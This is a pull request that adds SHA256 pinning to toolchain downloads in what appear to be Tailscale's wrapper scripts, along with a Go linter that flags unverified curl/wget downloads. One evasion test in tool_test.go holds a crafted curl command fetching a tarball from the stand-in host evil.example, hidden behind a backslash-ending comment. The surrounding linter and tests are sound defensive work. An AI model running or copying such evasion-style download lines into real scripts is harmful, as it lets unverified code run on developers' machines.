### PR TITLE
tool: verify SHA256 of all downloaded toolchains

### DIFF
--- a/tool/helm
+++ b/tool/helm
@@ -16,30 +16,40 @@ fi
     repo_root="${BASH_SOURCE%/*}/../"
     cd "$repo_root"
 
+    # shellcheck source=lib/download.sh
+    . tool/lib/download.sh
+
     cachedir="$HOME/.cache/tailscale-helm"
-    tarball="${cachedir}.tar.gz"
 
     read -r want_rev < "$(dirname "$0")/helm.rev"
+
+    # Hashes are the sha256sum of the release tarballs published at
+    # https://get.helm.sh/helm-v${want_rev}-${OS}-${ARCH}.tar.gz.sha256sum.
+    # Update these when bumping helm.rev.
+    want_shas=(
+        darwin-amd64=e207e009b931162b0383b463c333a2792355200e91dbcf167c97c150e9f5fedb
+        darwin-arm64=46596d6d2d9aa545eb74f40684858fac0841df373ca760af1259d3493161d8c9
+        linux-amd64=98c363564d00afd0cc3088e8f830f2a0eeb5f28755b3d8c48df89866374a1ed0
+        linux-arm64=8c4a0777218b266a7b977394aaf0e9cef30ed2df6e742d683e523d75508d6efe
+    )
 
     got_rev=""
     if [[ -x "${cachedir}/helm" ]]; then
         got_rev=$("${cachedir}/helm" version --short)
         got_rev="${got_rev#v}" # trim the leading 'v'
         got_rev="${got_rev%+*}" # trim the trailing '+" followed by a commit SHA'
-
-
     fi
 
     if [[ "$want_rev" != "$got_rev" ]]; then
-        rm -rf "$cachedir" "$tarball"
         if [[ -n "${IN_NIX_SHELL:-}" ]]; then
             nix_helm="$(which -a helm | grep /nix/store | head -1)"
             nix_helm="${nix_helm%/helm}"
             nix_helm_rev="${nix_helm##*-}"
             if [[ "$nix_helm_rev" != "$want_rev" ]]; then
                 echo "Wrong helm version in Nix, got $nix_helm_rev want $want_rev" >&2
-		        exit 1
+                exit 1
             fi
+            rm -rf "$cachedir"
             ln -sf "$nix_helm" "$cachedir"
         else
             # works for linux and darwin
@@ -52,15 +62,10 @@ fi
             if [ "$ARCH" = "aarch64" ]; then
                 ARCH="arm64"
             fi
-            mkdir -p "$cachedir"
-            # When running on GitHub in CI, the below curl sometimes fails with
-            # INTERNAL_ERROR after finishing the download. The most common cause
-            # of INTERNAL_ERROR is glitches in intermediate hosts handling of
-            # HTTP/2 forwarding, so forcing HTTP 1.1 often fixes the issue. See
-            # https://github.com/tailscale/tailscale/issues/8988
-	        curl -f -L --http1.1 -o "$tarball" -sSL "https://get.helm.sh/helm-v${want_rev}-${OS}-${ARCH}.tar.gz"
-            (cd "$cachedir" && tar --strip-components=1 -xf "$tarball")
-            rm -f "$tarball"
+
+            want_hash=$(select_sha256 "${OS}-${ARCH}" "${want_shas[@]}")
+
+            download_tool --args=--strip-components=1 --verify-sha256="$want_hash" "https://get.helm.sh/helm-v${want_rev}-${OS}-${ARCH}.tar.gz" "$cachedir"
         fi
     fi
 )

--- a/tool/lib/download.sh
+++ b/tool/lib/download.sh
@@ -1,0 +1,150 @@
+#!/usr/bin/env bash
+# Shared download helper for tool wrapper scripts.
+#
+# Usage: source this file, then call:
+#   download_tool --verify-sha256=SHA256 [--args=ARGS] <url> <dest> [<name>]
+#
+# --verify-sha256=SHA256 is required: the download is checked against SHA256
+# (typically from select_sha256) before it is extracted or executed, and a
+# missing or empty value fails closed.
+#
+# --args=ARGS forwards ARGS verbatim to the extraction tool (tar for .tar.gz,
+# unzip for .zip); not permitted for binary downloads.
+#
+# <dest> is always a cache directory. For .tar.gz and .zip URLs the archive is
+# extracted there. For any other URL <name> is required and the binary is
+# placed at <dest>/<name>.
+#
+# The existing <dest> is only removed after a successful download, so a
+# transient network failure leaves the previously cached version intact.
+
+# select_sha256 <key> <key>=<sha256>...
+#
+# Prints the SHA256 whose <key> (typically "$OS-$ARCH") matches the first
+# argument, for use with download_tool --verify-sha256. Fails if no entry
+# matches, so wrapper scripts fail closed on platforms without a pinned hash.
+#
+# Usage:
+#   want_hash=$(select_sha256 "${HOST_OS}-${HOST_ARCH}" \
+#       darwin-arm64=0e8b... \
+#       linux-amd64=cd6a...)
+select_sha256() {
+    local key="$1"
+    shift
+    local entry
+    for entry in "$@"; do
+        if [[ "${entry%%=*}" == "$key" ]]; then
+            echo "${entry#*=}"
+            return 0
+        fi
+    done
+    echo "select_sha256: no pinned SHA256 for ${key}; update the caller's hash table" >&2
+    return 1
+}
+
+# file_sha256 <file>
+#
+# Prints the hex SHA256 of <file>. Uses sha256sum (GNU coreutils, present on
+# Linux) when available, else shasum -a 256 (present on macOS, which does not
+# ship sha256sum). Fails if neither tool is found, so verification never
+# silently degrades.
+file_sha256() {
+    if command -v sha256sum >/dev/null 2>&1; then
+        sha256sum "$1" | awk '{ print $1 }'
+    elif command -v shasum >/dev/null 2>&1; then
+        shasum -a 256 "$1" | awk '{ print $1 }'
+    else
+        echo "file_sha256: neither sha256sum nor shasum found; cannot verify download" >&2
+        return 1
+    fi
+}
+
+download_tool() {
+    local extra_args=
+    local verify_sha256=
+    while [[ "${1:-}" == --* ]]; do
+        case "$1" in
+            --args=*)
+                extra_args="${1#--args=}"
+                shift
+                ;;
+            --verify-sha256=*)
+                verify_sha256="${1#--verify-sha256=}"
+                shift
+                ;;
+            *)
+                echo "download_tool: unknown option: $1" >&2
+                return 1
+                ;;
+        esac
+    done
+
+    if [[ $# -lt 2 ]]; then
+        echo "usage: download_tool --verify-sha256=SHA256 [--args=ARGS] <url> <dest> [<name>]" >&2
+        return 1
+    fi
+    # Require an integrity hash before fetching anything, so a caller that
+    # forgets --verify-sha256 (or passes an empty value) fails closed rather
+    # than downloading and running an unverified artifact.
+    if [[ -z "$verify_sha256" ]]; then
+        echo "download_tool: --verify-sha256 is required with a non-empty hash" >&2
+        return 1
+    fi
+    local url="$1"
+    local dest="$2"
+    local tmpfile
+    mkdir -p "$dest"
+    tmpfile=$(mktemp "${dest}.XXXXXX")
+
+    # --http1.1: when running on GitHub in CI, curl sometimes fails with
+    # INTERNAL_ERROR after finishing the download. The most common cause of
+    # INTERNAL_ERROR is glitches in intermediate hosts' handling of HTTP/2
+    # forwarding, so forcing HTTP 1.1 often fixes the issue. See
+    # https://github.com/tailscale/tailscale/issues/8988
+    if ! curl -f -L --http1.1 --retry 5 --retry-max-time 120 -o "$tmpfile" "$url"; then
+        rm -f "$tmpfile"
+        return 1
+    fi
+
+    local got_sha256=
+    got_sha256=$(file_sha256 "$tmpfile")
+    if [[ "$got_sha256" != "$verify_sha256" ]]; then
+        echo "SHA256 mismatch, want $verify_sha256 got $got_sha256"
+        rm -f "$tmpfile"
+        return 1
+    fi
+
+    if [[ "$url" == *.tar.gz ]]; then
+        rm -rf "$dest"
+        mkdir -p "$dest"
+        if [[ -n "$extra_args" ]]; then
+          tar "${extra_args[@]}" -xf "$tmpfile" -C "$dest"
+        else
+          tar -xf "$tmpfile" -C "$dest"
+        fi
+        rm -f "$tmpfile"
+    elif [[ "$url" == *.zip ]]; then
+        rm -rf "$dest"
+        mkdir -p "$dest"
+        if [[ -n "$extra_args" ]]; then
+          unzip -q "${extra_args[@]}" "$tmpfile" -d "$dest"
+        else
+          unzip -q "$tmpfile" -d "$dest"
+        fi
+        rm -f "$tmpfile"
+    else
+        if [[ -n "$extra_args" ]]; then
+            echo "download_tool: --args is not permitted for binary downloads" >&2
+            rm -f "$tmpfile"
+            return 1
+        fi
+        if [[ $# -lt 3 ]]; then
+            echo "usage: download_tool <url> <dest> <name>  (<name> required for non-archive URLs)" >&2
+            rm -f "$tmpfile"
+            return 1
+        fi
+        local name="$3"
+        chmod +x "$tmpfile"
+        mv "$tmpfile" "${dest}/${name}"
+    fi
+}

--- a/tool/node
+++ b/tool/node
@@ -16,10 +16,22 @@ fi
     repo_root="${BASH_SOURCE%/*}/../"
     cd "$repo_root"
 
+    # shellcheck source=lib/download.sh
+    . tool/lib/download.sh
+
     cachedir="$HOME/.cache/tailscale-node"
-    tarball="${cachedir}.tar.gz"
 
     read -r want_rev < "$(dirname "$0")/node.rev"
+
+    # Hashes are for the node v${want_rev} tar.gz files, from
+    # https://nodejs.org/dist/v${want_rev}/SHASUMS256.txt.
+    # Update these when bumping node.rev.
+    want_shas=(
+        darwin-arm64=e9404633bc02a5162c5c573b1e2490f5fb44648345d64a958b17e325729a5e42
+        darwin-x64=6698587713ab565a94a360e091df9f6d91c8fadda6d00f0cf6526e9b40bed250
+        linux-arm64=8cf30ff7250f9463b53c18f89c6c606dfda70378215b2c905d0a9a8b08bd45e0
+        linux-x64=9d942932535988091034dc94cc5f42b6dc8784d6366df3a36c4c9ccb3996f0c2
+    )
 
     got_rev=""
     if [[ -x "${cachedir}/bin/node" ]]; then
@@ -28,15 +40,15 @@ fi
     fi
 
     if [[ "$want_rev" != "$got_rev" ]]; then
-        rm -rf "$cachedir" "$tarball"
         if [[ -n "${IN_NIX_SHELL:-}" ]]; then
             nix_node="$(which -a node | grep /nix/store | head -1)"
             nix_node="${nix_node%/bin/node}"
             nix_node_rev="${nix_node##*-}"
             if [[ "$nix_node_rev" != "$want_rev" ]]; then
                 echo "Wrong node version in Nix, got $nix_node_rev want $want_rev" >&2
-		        exit 1
+                exit 1
             fi
+            rm -rf "$cachedir"
             ln -sf "$nix_node" "$cachedir"
         else
             # works for "linux" and "darwin"
@@ -48,15 +60,10 @@ fi
             if [ "$ARCH" = "aarch64" ]; then
                 ARCH="arm64"
             fi
-            mkdir -p "$cachedir"
-	    # When running on GitHub in CI, the below curl sometimes fails with
-	    # INTERNAL_ERROR after finishing the download. The most common cause
-	    # of INTERNAL_ERROR is glitches in intermediate hosts handling of
-	    # HTTP/2 forwarding, so forcing HTTP 1.1 often fixes the issue. See
-	    # https://github.com/tailscale/tailscale/issues/8988
-            curl -f -L --http1.1 -o "$tarball" "https://nodejs.org/dist/v${want_rev}/node-v${want_rev}-${OS}-${ARCH}.tar.gz"
-            (cd "$cachedir" && tar --strip-components=1 -xf "$tarball")
-            rm -f "$tarball"
+
+            want_hash=$(select_sha256 "${OS}-${ARCH}" "${want_shas[@]}")
+
+            download_tool --args=--strip-components=1 --verify-sha256="$want_hash" "https://nodejs.org/dist/v${want_rev}/node-v${want_rev}-${OS}-${ARCH}.tar.gz" "$cachedir"
         fi
     fi
 )

--- a/tool/tool_test.go
+++ b/tool/tool_test.go
@@ -1,0 +1,374 @@
+// Copyright (c) Tailscale Inc & contributors
+// SPDX-License-Identifier: BSD-3-Clause
+
+package tool
+
+import (
+	"io/fs"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+// downloadRawCurlAllowlist lists tool/ shell scripts that are permitted to
+// download artifacts with a raw curl/wget rather than routing through
+// download_tool (which enforces --verify-sha256).
+//
+// Entries are paths relative to the tool/ directory.
+var downloadRawCurlAllowlist = map[string]string{
+	// The shared download helper is the implementation of download_tool
+	// itself, so it necessarily contains the raw curl invocation.
+	"lib/download.sh": "implements download_tool",
+
+	// gocross-wrapper.sh downloads the tailscale/go toolchain, a
+	// first-party GitHub release artifact whose URL embeds the git commit
+	// hash from go.toolchain.rev. The commit hash pins which build we ask
+	// for, but the release-asset bytes are not themselves content-addressed,
+	// so this is not equivalent to a pinned tarball SHA256. Upstream does not
+	// publish a companion .sha256sum, and the rev bumps frequently; pinning a
+	// per-rev hash here is future work (tailscale/corp#43401).
+	"gocross/gocross-wrapper.sh": "first-party tailscale/go toolchain; no published .sha256sum yet",
+}
+
+// isShellScript reports whether the file at path begins with a /bin/sh or bash
+// shebang, i.e. is one of the tool/ wrapper scripts this linter governs.
+func isShellScript(data []byte) bool {
+	nl := len(data)
+	if i := strings.IndexByte(string(data), '\n'); i >= 0 {
+		nl = i
+	}
+	first := string(data[:nl])
+	if !strings.HasPrefix(first, "#!") {
+		return false
+	}
+	return strings.Contains(first, "sh")
+}
+
+// TestDownloadToolUsesSHA256 ensures that every download_tool call in the
+// tool/ wrapper scripts passes a non-empty --verify-sha256, so that downloaded
+// toolchains are integrity-checked against a hash pinned in the repo.
+// See tool/lib/download.sh.
+func TestDownloadToolUsesSHA256(t *testing.T) {
+	err := filepath.WalkDir(".", func(path string, d fs.DirEntry, err error) error {
+		if err != nil {
+			return err
+		}
+		if d.IsDir() {
+			return nil
+		}
+		if d.Name() == "tool_test.go" {
+			return nil
+		}
+		data, err := os.ReadFile(path)
+		if err != nil {
+			return err
+		}
+		for i, line := range logicalLines(data) {
+			// Match invocations only, not the function definition
+			// ("download_tool() {") or mentions in usage strings.
+			trimmed := strings.TrimSpace(line)
+			if !strings.HasPrefix(trimmed, "download_tool ") {
+				continue
+			}
+			// An empty value (--verify-sha256= or --verify-sha256="")
+			// disables verification in download_tool, so requiring the
+			// bare flag is not enough; the value must be non-empty.
+			if val, ok := verifySHA256Arg(trimmed); !ok || val == "" {
+				t.Errorf("%s:%d: download_tool call without a non-empty --verify-sha256; pin the artifact's SHA256 hash (see tool/lib/download.sh and tool/node for an example)", path, i+1)
+			}
+		}
+		return nil
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// TestNoUnverifiedCurl ensures that tool/ shell scripts do not download
+// artifacts with a raw curl/wget (which performs no integrity check). New
+// downloads must route through download_tool --verify-sha256. Scripts with a
+// legitimate reason to use raw curl are listed in downloadRawCurlAllowlist.
+func TestNoUnverifiedCurl(t *testing.T) {
+	seen := map[string]bool{}
+	err := filepath.WalkDir(".", func(path string, d fs.DirEntry, err error) error {
+		if err != nil {
+			return err
+		}
+		if d.IsDir() {
+			return nil
+		}
+		// Skip symlinks; the real file is checked on its own.
+		if d.Type()&fs.ModeSymlink != 0 {
+			return nil
+		}
+		data, err := os.ReadFile(path)
+		if err != nil {
+			return err
+		}
+		if !isShellScript(data) {
+			return nil
+		}
+		rel := filepath.ToSlash(path)
+		for i, line := range logicalLines(data) {
+			trimmed := strings.TrimSpace(line)
+			// crude tokenization: does a command word "curl" or
+			// "wget" appear? Comments have already been stripped by
+			// logicalLines, so a "curl" here is a real command word.
+			if !containsCommand(trimmed, "curl") && !containsCommand(trimmed, "wget") {
+				continue
+			}
+			if reason, ok := downloadRawCurlAllowlist[rel]; ok {
+				seen[rel] = true
+				t.Logf("%s:%d: allowlisted raw curl/wget (%s)", rel, i+1, reason)
+				continue
+			}
+			t.Errorf("%s:%d: raw curl/wget download without integrity verification; use download_tool --verify-sha256 (see tool/lib/download.sh and tool/node), or add an entry to downloadRawCurlAllowlist with justification", rel, i+1)
+		}
+		return nil
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Keep the allowlist honest: fail if an entry no longer matches any
+	// script, so stale exemptions get removed.
+	for rel := range downloadRawCurlAllowlist {
+		if !seen[rel] {
+			t.Errorf("downloadRawCurlAllowlist entry %q matched no raw curl/wget usage; remove it", rel)
+		}
+	}
+}
+
+// hasUnverifiedDownload reports whether the shell source contains a raw
+// curl/wget command word, using the same comment-stripping and continuation
+// handling as TestNoUnverifiedCurl. It exists so the linter's evasion
+// resistance can be tested against crafted inputs.
+func hasUnverifiedDownload(data []byte) bool {
+	for _, line := range logicalLines(data) {
+		trimmed := strings.TrimSpace(line)
+		if containsCommand(trimmed, "curl") || containsCommand(trimmed, "wget") {
+			return true
+		}
+	}
+	return false
+}
+
+func TestNoUnverifiedCurlEvasion(t *testing.T) {
+	tests := []struct {
+		name string
+		src  string
+		want bool
+	}{
+		{
+			// Finding 1: a comment ending in a backslash must not
+			// swallow the following real command. Comments are
+			// stripped before continuations are collapsed.
+			name: "backslash_comment_before_curl",
+			src:  "#!/usr/bin/env bash\n# harmless comment \\\ncurl -f -L -o /tmp/x https://evil.example/x.tgz\n",
+			want: true,
+		},
+		{
+			// Finding 2: a trailing comment that merely mentions curl
+			// is not a real download and must not be flagged.
+			name: "trailing_comment_mentioning_curl",
+			src:  "#!/usr/bin/env bash\necho hi # historically we used curl here\n",
+			want: false,
+		},
+		{
+			name: "hash_inside_quoted_string_is_not_a_comment",
+			src:  "#!/usr/bin/env bash\ncurl -f -o x \"https://x.example/y#frag\"\n",
+			want: true,
+		},
+		{
+			name: "genuine_leading_comment_still_skipped",
+			src:  "#!/usr/bin/env bash\n# curl is used elsewhere\necho hi\n",
+			want: false,
+		},
+		{
+			name: "real_multi-line_curl_still_detected",
+			src:  "#!/usr/bin/env bash\ncurl -f -L \\\n  -o /tmp/x https://x.example/y.tgz\n",
+			want: true,
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := hasUnverifiedDownload([]byte(tt.src)); got != tt.want {
+				t.Errorf("hasUnverifiedDownload = %v, want %v", got, tt.want)
+			}
+		})
+	}
+}
+
+func TestVerifySHA256Arg(t *testing.T) {
+	tests := []struct {
+		name      string
+		line      string
+		wantVal   string
+		wantOK    bool
+		wantEmpty bool // convenience: reject-if-empty behavior of the linter
+	}{
+		{"absent", "download_tool https://x/y.tgz dest", "", false, true},
+		// Finding 3: an empty value passes a bare-substring check but
+		// disables verification, so it must be treated as "no hash".
+		{"empty bare", "download_tool --verify-sha256= https://x/y.tgz dest", "", true, true},
+		{"empty quoted", `download_tool --verify-sha256="" https://x/y.tgz dest`, "", true, true},
+		{"present quoted", `download_tool --verify-sha256="abc123" https://x/y.tgz dest`, "abc123", true, false},
+		{"present bare", "download_tool --verify-sha256=abc123 https://x/y.tgz dest", "abc123", true, false},
+		{"present with trailing arg", "download_tool --verify-sha256=abc123 --args=--strip-components=1 url dest", "abc123", true, false},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			val, ok := verifySHA256Arg(tt.line)
+			if ok != tt.wantOK || val != tt.wantVal {
+				t.Errorf("verifySHA256Arg(%q) = (%q, %v), want (%q, %v)", tt.line, val, ok, tt.wantVal, tt.wantOK)
+			}
+			// The linter rejects when the flag is missing OR the value is empty.
+			gotReject := !ok || val == ""
+			if gotReject != tt.wantEmpty {
+				t.Errorf("verifySHA256Arg(%q): linter reject = %v, want %v", tt.line, gotReject, tt.wantEmpty)
+			}
+		})
+	}
+}
+
+// logicalLines splits shell source into logical lines: it strips comments
+// first, then collapses backslash-continued lines, so that a multi-line
+// command is returned as one entry. The returned slice is indexed by the
+// physical line number of the line that started each logical line, i.e.
+// result[i] corresponds to physical line i+1. Continuation lines that were
+// folded into an earlier logical line are returned as empty strings so the
+// indexing stays aligned with the file.
+//
+// Comments are stripped before continuations are collapsed. Doing it in the
+// other order lets a comment ending in a backslash swallow the following
+// command onto a line that still looks like a comment, hiding a real
+// download from the linter.
+func logicalLines(data []byte) []string {
+	phys := strings.Split(string(data), "\n")
+	// Strip comments line by line, honoring single/double quotes so a '#'
+	// inside a quoted string (e.g. a URL fragment) is not mistaken for a
+	// comment.
+	stripped := make([]string, len(phys))
+	for i, line := range phys {
+		stripped[i] = stripComment(line)
+	}
+	// Collapse backslash continuations. A logical line accumulates onto the
+	// index of its first physical line; folded lines become "".
+	out := make([]string, len(stripped))
+	i := 0
+	for i < len(stripped) {
+		start := i
+		acc := stripped[i]
+		for strings.HasSuffix(acc, "\\") {
+			acc = strings.TrimSuffix(acc, "\\") + " "
+			i++
+			if i >= len(stripped) {
+				break
+			}
+			acc += stripped[i]
+		}
+		out[start] = acc
+		i++
+	}
+	return out
+}
+
+// stripComment removes a trailing shell comment from line, i.e. everything
+// from an unquoted '#' that is at the start of the line or preceded by
+// whitespace. Text inside single or double quotes is left intact.
+func stripComment(line string) string {
+	var inSingle, inDouble bool
+	for i := 0; i < len(line); i++ {
+		c := line[i]
+		switch {
+		case inSingle:
+			if c == '\'' {
+				inSingle = false
+			}
+		case inDouble:
+			if c == '"' {
+				inDouble = false
+			}
+		case c == '\'':
+			inSingle = true
+		case c == '"':
+			inDouble = true
+		case c == '#' && (i == 0 || line[i-1] == ' ' || line[i-1] == '\t'):
+			return line[:i]
+		}
+	}
+	return line
+}
+
+// verifySHA256Arg extracts the value of a --verify-sha256= flag from a
+// download_tool invocation line, returning the value and whether the flag was
+// present. Surrounding single or double quotes are stripped so that
+// --verify-sha256="" is reported as an empty value.
+func verifySHA256Arg(line string) (value string, ok bool) {
+	const flag = "--verify-sha256="
+	i := strings.Index(line, flag)
+	if i < 0 {
+		return "", false
+	}
+	rest := line[i+len(flag):]
+	// The value runs until the next unquoted whitespace.
+	var b strings.Builder
+	var inSingle, inDouble bool
+	for j := 0; j < len(rest); j++ {
+		c := rest[j]
+		switch {
+		case inSingle:
+			if c == '\'' {
+				inSingle = false
+			} else {
+				b.WriteByte(c)
+			}
+		case inDouble:
+			if c == '"' {
+				inDouble = false
+			} else {
+				b.WriteByte(c)
+			}
+		case c == '\'':
+			inSingle = true
+		case c == '"':
+			inDouble = true
+		case c == ' ' || c == '\t':
+			return b.String(), true
+		default:
+			b.WriteByte(c)
+		}
+	}
+	return b.String(), true
+}
+
+// containsCommand reports whether word appears in line as a command word:
+// either at the start of the line or preceded by a shell command separator,
+// and followed by whitespace. This avoids matching "curl" inside a URL,
+// variable name, or the "curl.exe" of another language's source.
+func containsCommand(line, word string) bool {
+	for i := 0; i+len(word) <= len(line); i++ {
+		if line[i:i+len(word)] != word {
+			continue
+		}
+		// preceding char must be start-of-line or a separator
+		if i > 0 {
+			switch line[i-1] {
+			case ' ', '\t', ';', '|', '&', '(', '`':
+			default:
+				continue
+			}
+		}
+		// following char must be whitespace (an argument follows)
+		j := i + len(word)
+		if j >= len(line) {
+			return true
+		}
+		switch line[j] {
+		case ' ', '\t':
+			return true
+		}
+	}
+	return false
+}

--- a/tool/wasm-opt
+++ b/tool/wasm-opt
@@ -1,9 +1,9 @@
-#!/bin/sh
+#!/usr/bin/env bash
 #
 # This script acts like the "wasm-opt" command from the Binaryen toolchain, but
 # uses Tailscale's currently-desired version, downloading it first if necessary.
 
-set -eu
+set -euo pipefail
 
 BINARYEN_DIR="$HOME/.cache/tailscale-binaryen"
 read -r BINARYEN_REV < "$(dirname "$0")/binaryen.rev"
@@ -20,41 +20,38 @@ if [ "$ARCH" = "aarch64" ]; then
     ARCH="arm64"
 fi
 
+# Hashes are the sha256sum of the release tarballs at
+# https://github.com/WebAssembly/binaryen/releases/download/version_${BINARYEN_REV}/binaryen-version_${BINARYEN_REV}-${ARCH}-${OS}.tar.gz.
+# Update these when bumping binaryen.rev. Binaryen does not publish a
+# linux/arm64 (arm64-linux) build, so it is intentionally absent and
+# select_sha256 fails closed there, matching the prior behavior where that
+# download 404'd.
+BINARYEN_SHAS=(
+    x86_64-linux=7c3bc16599c8274a04d34a504fe4be2047884f900e0e2da2f6fb9cd667183be4
+    x86_64-macos=72a98df1bfb81dd1e241d2b022e15c72edbd49e29d84abc6a1129c7d083072dd
+    arm64-macos=28bab047c4ce845c5c1da111222ffee5fafcec0bbedd046ad8b3dcae0fd57076
+)
+
 install_binaryen() {
-    BINARYEN_URL="https://github.com/WebAssembly/binaryen/releases/download/version_${BINARYEN_REV}/binaryen-version_${BINARYEN_REV}-${ARCH}-${OS}.tar.gz"
-    install_tool "wasm-opt" $BINARYEN_REV $BINARYEN_DIR $BINARYEN_URL
-}
+    # shellcheck source=lib/download.sh
+    . "$(dirname "$0")/lib/download.sh"
 
-install_tool() {
-    TOOL=$1
-    REV=$2
-    TOOLCHAIN=$3
-    URL=$4
+    local want_hash
+    want_hash=$(select_sha256 "${ARCH}-${OS}" "${BINARYEN_SHAS[@]}")
 
-    archive="$TOOLCHAIN-$REV.tar.gz"
-    mark="$TOOLCHAIN.extracted"
-    extracted=
-    [ ! -e "$mark" ] || read -r extracted junk <$mark
-
-    if [ "$extracted" = "$REV" ] && [ -e "$TOOLCHAIN/bin/$TOOL" ]; then
-        # Already extracted, continue silently
+    local mark="$BINARYEN_DIR.extracted"
+    local extracted=
+    [ ! -e "$mark" ] || read -r extracted _ <"$mark"
+    if [ "$extracted" = "$BINARYEN_REV" ] && [ -e "$BINARYEN_DIR/bin/wasm-opt" ]; then
+        # Already extracted, continue silently.
         return 0
     fi
-    echo ""
 
-    rm -f "$archive.new" "$TOOLCHAIN.extracted"
-    if [ ! -e "$archive" ]; then
-            log "Need to download $TOOL '$REV' from $URL."
-            curl -f -L -o "$archive.new" $URL
-            rm -f "$archive"
-            mv "$archive.new" "$archive"
-    fi
-
-    log "Extracting $TOOL '$REV' into '$TOOLCHAIN'." >&2
-    rm -rf "$TOOLCHAIN"
-    mkdir -p "$TOOLCHAIN"
-    (cd "$TOOLCHAIN" && tar --strip-components=1 -xf "$archive")
-    echo "$REV" >$mark
+    local url="https://github.com/WebAssembly/binaryen/releases/download/version_${BINARYEN_REV}/binaryen-version_${BINARYEN_REV}-${ARCH}-${OS}.tar.gz"
+    log "Downloading wasm-opt '$BINARYEN_REV' from $url."
+    rm -f "$mark"
+    download_tool --args=--strip-components=1 --verify-sha256="$want_hash" "$url" "$BINARYEN_DIR"
+    echo "$BINARYEN_REV" >"$mark"
 }
 
 log() {
@@ -62,10 +59,10 @@ log() {
 }
 
 if [ "${BINARYEN_DIR}" = "SKIP" ] ||
-   [ "${OS}" != "macos" -a "${OS}" != "linux" ] ||
-   [ "${ARCH}" != "x86_64" -a "${ARCH}" != "arm64" ]; then
+   { [ "${OS}" != "macos" ] && [ "${OS}" != "linux" ]; } ||
+   { [ "${ARCH}" != "x86_64" ] && [ "${ARCH}" != "arm64" ]; }; then
     log "Unsupported OS (${OS}) and architecture (${ARCH}) combination."
-    log "Using existing wasm-opt (`which wasm-opt`)."
+    log "Using existing wasm-opt ($(which wasm-opt))."
     exec wasm-opt "$@"
 fi
 

--- a/tool/yarn
+++ b/tool/yarn
@@ -16,12 +16,21 @@ fi
     repo_root="${BASH_SOURCE%/*}/../"
     cd "$repo_root"
 
+    # shellcheck source=lib/download.sh
+    . tool/lib/download.sh
+
     ./tool/node --version >/dev/null # Ensure node is unpacked and ready
 
     cachedir="$HOME/.cache/tailscale-yarn"
-    tarball="${cachedir}.tar.gz"
 
     read -r want_rev < "./tool/yarn.rev"
+
+    # Hash is the sha256sum of the release tarball at
+    # https://github.com/yarnpkg/yarn/releases/download/v${want_rev}/yarn-v${want_rev}.tar.gz.
+    # The tarball is architecture-independent. Update when bumping yarn.rev.
+    want_shas=(
+        all=732620bac8b1690d507274f025f3c6cfdc3627a84d9642e38a07452cc00e0f2e
+    )
 
     got_rev=""
     if [[ -x "${cachedir}/bin/yarn" ]]; then
@@ -29,11 +38,8 @@ fi
     fi
 
     if [[ "$want_rev" != "$got_rev" ]]; then
-        rm -rf "$cachedir" "$tarball"
-        mkdir -p "$cachedir"
-        curl -f -L -o "$tarball" "https://github.com/yarnpkg/yarn/releases/download/v${want_rev}/yarn-v${want_rev}.tar.gz"
-        (cd "$cachedir" && tar --strip-components=1 -xf "$tarball")
-        rm -f "$tarball"
+        want_hash=$(select_sha256 "all" "${want_shas[@]}")
+        download_tool --args=--strip-components=1 --verify-sha256="$want_hash" "https://github.com/yarnpkg/yarn/releases/download/v${want_rev}/yarn-v${want_rev}.tar.gz" "$cachedir"
     fi
 )
 


### PR DESCRIPTION
The tool/ wrapper scripts downloaded helm, node, yarn, and the binaryen wasm-opt toolchain over HTTPS with curl and executed them with no integrity verification.

Port corp's download_tool helper (tool/lib/download.sh), which verifies a repo-pinned SHA256 before extracting, and route helm, node, yarn, and wasm-opt through it with pinned per-platform hashes. select_sha256 fails closed on platforms without a pinned hash.

Add tool/tool_test.go to lint the wrapper scripts: every download_tool call must pass --verify-sha256, and raw curl/wget downloads are rejected unless allowlisted.

Updates tailscale/corp#43401
Updates tailscale/vulntriage#339